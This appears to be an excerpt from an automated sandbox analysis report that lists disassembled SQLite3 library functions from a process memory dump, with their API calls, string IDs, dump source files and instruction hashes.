                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E52916
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E52945
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E52956
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_result_error_nomemsqlite3_value_textsqlite3_vmprintf
                                                                                                    • String ID: `a$fts5_expr$fts5_expr_tcl
                                                                                                    • API String ID: 1595095055-2132151227
                                                                                                    • Opcode ID: 800e1cad95f52f40fcbf763c90df62f1a6c6da41dad2d6313686a6d17a848f9c
                                                                                                    • Instruction ID: 14ffd30f887e12be814a85a0702a4630d324d72c080d44708b14093fca3b6074
                                                                                                    • Opcode Fuzzy Hash: 800e1cad95f52f40fcbf763c90df62f1a6c6da41dad2d6313686a6d17a848f9c
                                                                                                    • Instruction Fuzzy Hash: 5061E2B0A0464ACBCB50DFA9C58069EBBF1BF88314F24C52DE498AB350E735D842CF91
                                                                                                    Function 61E3900C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 310COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E39065
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E39091
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E390C4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E390E4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E390FA
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E3910E
                                                                                                    • sqlite3_realloc64.SQLITE3 ref: 61E391F1
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E39318
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave$sqlite3_realloc64sqlite3_snprintf
                                                                                                    • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                                                                    • API String ID: 424382227-1629717226
                                                                                                    • Opcode ID: 2d57b7fe6b62475711c307f2ec129368321e7ea4770cb377c0c83cba3d718250
                                                                                                    • Instruction ID: 6412be334ec0f354fa733febc5b08a3c69c33ceeed9e50db3f89bacae616ca25
                                                                                                    • Opcode Fuzzy Hash: 2d57b7fe6b62475711c307f2ec129368321e7ea4770cb377c0c83cba3d718250
                                                                                                    • Instruction Fuzzy Hash: 6BD112B4A047568FDB00DF69C584A5EBBF1BF89348F21C86DE8999B354DB34D841CB82
                                                                                                    Function 61E37850 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                                                                    • String ID: [a
                                                                                                    • API String ID: 2048698484-2962088570
                                                                                                    • Opcode ID: 5f55b46d6229d52586ac0d9595075a1e8844d8b405ebf804faf1ea534987c731
                                                                                                    • Instruction ID: 05c70ca99271660858b9553f56d4216a1fbc117b8adc26e9e40bfab2a0b17c28
                                                                                                    • Opcode Fuzzy Hash: 5f55b46d6229d52586ac0d9595075a1e8844d8b405ebf804faf1ea534987c731
                                                                                                    • Instruction Fuzzy Hash: 0A41C7B0909766DBCB10AF68C48465DBBF0BF89724F25CA1DE8A89B390D374D441CF92
                                                                                                    Function 61E5D2E3 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 223COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28BB6: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5CB65), ref: 61E28BFA
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E5D324
                                                                                                    • sqlite3_prepare_v2.SQLITE3 ref: 61E5D363
                                                                                                    • sqlite3_step.SQLITE3 ref: 61E5D3B3
                                                                                                    • sqlite3_errmsg.SQLITE3 ref: 61E5D54A
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                                                                                    • String ID: d$d
                                                                                                    • API String ID: 154587148-195624457
                                                                                                    • Opcode ID: 6c7b5f748d73142e7676b15902a0c2e77f0f9a200c23dc30934298302d348407
                                                                                                    • Instruction ID: bb4a072ab4f4fa5e5893f77ee424e08de43fd30d9280efa8ce2e656b90af3ede
                                                                                                    • Opcode Fuzzy Hash: 6c7b5f748d73142e7676b15902a0c2e77f0f9a200c23dc30934298302d348407
                                                                                                    • Instruction Fuzzy Hash: D9910978A0425ADBDB40DFA9C08079EBBF1BF88358F25C429E894DB340D775E952CB91
                                                                                                    Function 61E36966 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E3697F
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                                    • String ID: + $ NOT $ OR $"$$a$(,)?$.a
                                                                                                    • API String ID: 2841607023-2535319329
                                                                                                    • Opcode ID: 498005085313d53d67cc302c03fb9dc4092edaafd912e63723d404d94d60849b
                                                                                                    • Instruction ID: 326b9fa4cadaa263b66147e981050464c0c38b3cdf0b4245af4ddea64c87f554
                                                                                                    • Opcode Fuzzy Hash: 498005085313d53d67cc302c03fb9dc4092edaafd912e63723d404d94d60849b
                                                                                                    • Instruction Fuzzy Hash: 82916A70A082A68FDB15CFA9C480699BBF1BFCD354F29C569D898AB311D334D902CF51
                                                                                                    Function 61E25F03 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                    • String ID: 9a$a
                                                                                                    • API String ID: 336169149-3987242933
                                                                                                    • Opcode ID: 71b38632cbc5b820d56c03cd183f9f82f2c5520cf5f9d13668de687408de8a0b
                                                                                                    • Instruction ID: 978a47d39f0f91a65e1bc7465fe86fb4b06c4689ec929b1d13862305177ef5ed
                                                                                                    • Opcode Fuzzy Hash: 71b38632cbc5b820d56c03cd183f9f82f2c5520cf5f9d13668de687408de8a0b
                                                                                                    • Instruction Fuzzy Hash: CE6191709083C58BD7119F68C8A4759BFF1AF89318F28CA5DD4C98B396D739D845CB42
                                                                                                    Function 61E36F36 Relevance: 18.4, APIs: 12, Instructions: 369COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                                                                    • String ID:
                                                                                                    • API String ID: 3802728871-0
                                                                                                    • Opcode ID: 552780c030f934bb2db165b4004faf2d4bc026fbf9398572731f4eff89720d7e
                                                                                                    • Instruction ID: 510b92b67e7be140282decdbf35a020757af541b91491ead75f355e30ee04cf1
                                                                                                    • Opcode Fuzzy Hash: 552780c030f934bb2db165b4004faf2d4bc026fbf9398572731f4eff89720d7e
                                                                                                    • Instruction Fuzzy Hash: 4B128F74D04369DFDB60DF68C984B8DBBF1BB88314F1085AAE899A7341E7349A85CF41
                                                                                                    Function 61E25736 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 341COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E25755
                                                                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 61E25836
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E2585C
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25AD8
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25B05
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25B0F
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25B75
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E25C98
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                    • String ID: a
                                                                                                    • API String ID: 2444656285-581836851
                                                                                                    • Opcode ID: 4f53c0fe107f5103ced05763f732beae662bd3eef9a5c93d25ad8a1bbe3dd325
                                                                                                    • Instruction ID: 0b8a80e7e567e9cf196c9a4292503e8befad02b4755717b70327e1d154ff6750
                                                                                                    • Opcode Fuzzy Hash: 4f53c0fe107f5103ced05763f732beae662bd3eef9a5c93d25ad8a1bbe3dd325
                                                                                                    • Instruction Fuzzy Hash: 03E19F7594835ACFDB208F58C9907D9BBF1BF49308F65C4AAD89867308D774D9828F42
                                                                                                    Function 61E37D3E Relevance: 16.7, APIs: 11, Instructions: 192COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E0A172: sqlite3_free.SQLITE3 ref: 61E0A181
                                                                                                      • Part of subcall function 61E0A172: sqlite3_free.SQLITE3 ref: 61E0A18C
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E37D6B
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E37D7E
                                                                                                    • sqlite3_malloc64.SQLITE3 ref: 61E37D93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3723316075-0
                                                                                                    • Opcode ID: a25e74efb5b2adbfc570f89205db52becc925aa085830c1972600abe517ca728
                                                                                                    • Instruction ID: b2ae4f47708c3329826352a13aaabe4dafd5dd962fa118565251ccddabafb4d2
                                                                                                    • Opcode Fuzzy Hash: a25e74efb5b2adbfc570f89205db52becc925aa085830c1972600abe517ca728
                                                                                                    • Instruction Fuzzy Hash: D07136B0D04255CFDB04DF69C4847AABBE1BF89318F25C4A9E8588B365E734D885CF91
                                                                                                    Function 61E332ED Relevance: 16.7, APIs: 11, Instructions: 175COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                                                                    • String ID:
                                                                                                    • API String ID: 3428878466-0
                                                                                                    • Opcode ID: 34868cb5833adf8a2b9f79e7ac2f822e959239ee9806215c8def9534db9e00fc
                                                                                                    • Instruction ID: 1ef3f209874388d111a1a06e8e39847a3df57e07e1f8d113540199d31e3aa782
                                                                                                    • Opcode Fuzzy Hash: 34868cb5833adf8a2b9f79e7ac2f822e959239ee9806215c8def9534db9e00fc
                                                                                                    • Instruction Fuzzy Hash: C071CE78E042599FCB01DFA8D480A9DBBF1AF88314F24856AE858EB345E775E841CF91
                                                                                                    Function 61E542F8 Relevance: 16.6, APIs: 11, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5430B
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E54316
                                                                                                    • sqlite3_reset.SQLITE3 ref: 61E54345
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5434F
                                                                                                      • Part of subcall function 61E51966: sqlite3_log.SQLITE3 ref: 61E5198A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E54360
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E54368
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E54399
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E543A6
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E543B1
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E543C2
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E543CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_finalize$sqlite3_logsqlite3_mutex_entersqlite3_reset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3265072988-0
                                                                                                    • Opcode ID: 20f1131eb9ff22f95b1dd4a6a2ae51ad4bb41eb8305cf6d520665806035cf099
                                                                                                    • Instruction ID: 8f34f1024890ea81321ae76a4e4043cc77738995ad124a4a8002484572c75a1c
                                                                                                    • Opcode Fuzzy Hash: 20f1131eb9ff22f95b1dd4a6a2ae51ad4bb41eb8305cf6d520665806035cf099
                                                                                                    • Instruction Fuzzy Hash: D1316930204B429BD750AFA9C0C4619BBF0BF84318F64892DD9898B711E771E9B4CF91
                                                                                                    Function 61E0C69E Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313487548-0
                                                                                                    • Opcode ID: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                                                                    • Instruction ID: 6cabcbaa96acf13e95b4bc1eed7da9d83643ed6a39fce2b02a8d6d0cdd8e6df5
                                                                                                    • Opcode Fuzzy Hash: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                                                                    • Instruction Fuzzy Hash: E5118974604A419BCB10AF78C4C4419FBE4EF48365B928A9DE88E8B315DB74D8A0CF55
                                                                                                    Function 61E33A24 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 341COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
